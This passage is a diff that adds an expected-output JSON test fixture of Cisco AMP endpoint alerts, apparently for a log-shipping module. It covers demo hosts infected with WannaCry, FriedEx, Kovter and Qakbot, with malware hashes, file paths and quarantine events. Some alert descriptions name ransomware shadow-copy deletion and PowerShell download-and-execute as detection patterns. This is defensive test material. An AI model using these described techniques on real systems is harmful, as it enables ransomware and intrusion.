"cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503298", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 40302, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503301", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 41422, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179213462437902", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 893000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 42542, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179213462437899", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 456000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43815, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503299", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 643000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 45179, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179209167470602", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 957000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 46299, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419179209167470598", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 47663, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179209167470601", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49034, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419179204872503300", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 894000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 50398, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 3020, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:59:33.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.MAP.Ransomware.rewrite", + "cisco.amp.detection_id": "6583840593074454529", + "cisco.amp.event_type_id": 1090519105, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 231000000, + "event.action": "Malicious Activity Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6583840597369422000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "75a758a0c5cea48c9922d64a113d0f9d", + "file.hash.sha1": "c78f4c22dd195a1791472a2c271a0c85b53900d9", + "file.hash.sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "file.name": "mscorsvw.exe", + "file.path": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 52012, + "process.hash.md5": "71c85477df9347fe8e7bc55768473fca", + "process.hash.sha1": "ff658a36899e43fec3966d608b4aa4472de7a378", + "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536", + "process.name": "services.exe", + "process.pid": 480, + "related.hash": [ + "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "75a758a0c5cea48c9922d64a113d0f9d", + "c78f4c22dd195a1791472a2c271a0c85b53900d9" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:59:30.000Z", + "cisco.amp.cloud_ioc.description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 182000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 6701398782847286000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:59:30.000Z", + "file.hash.sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10", + "file.name": "vssadmin.exe", + "file.path": "file:///C%3A/Windows/SysWOW64/vssadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 53662, + "process.hash.sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "related.hash": [ + "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:55:07.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 260000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 7007136036637603000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:55:07.000Z", + "file.hash.sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386", + "file.name": "cmd.exe", + "file.path": "file:///C%3A/Windows/system32/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 55441, + "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536", + "related.hash": [ + "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:47:17.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b6:9c:d0:89:b8:66" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b6:9c:d0:89:b8:66" + ], + "cisco.amp.timestamp_nanoseconds": 250000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1476905066250000100, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T10:47:17.000Z", + "file.hash.sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Command_Line_Arguments_Kovter", + "host.name": "Demo_Command_Line_Arguments_Kovter", + "input.type": "log", + "log.offset": 57151, + "process.hash.sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff", + "related.hash": [ + "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + ], + "related.hosts": [ + "Demo_Command_Line_Arguments_Kovter" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:47:17.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b6:9c:d0:89:b8:66" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b6:9c:d0:89:b8:66" + ], + "cisco.amp.timestamp_nanoseconds": 228000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1476905066228000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:47:17.000Z", + "file.hash.sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Command_Line_Arguments_Kovter", + "host.name": "Demo_Command_Line_Arguments_Kovter", + "input.type": "log", + "log.offset": 58928, + "process.hash.sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff", + "related.hash": [ + "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + ], + "related.hosts": [ + "Demo_Command_Line_Arguments_Kovter" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411425813945647106", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 60601, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411425813945647105", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 61802, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git 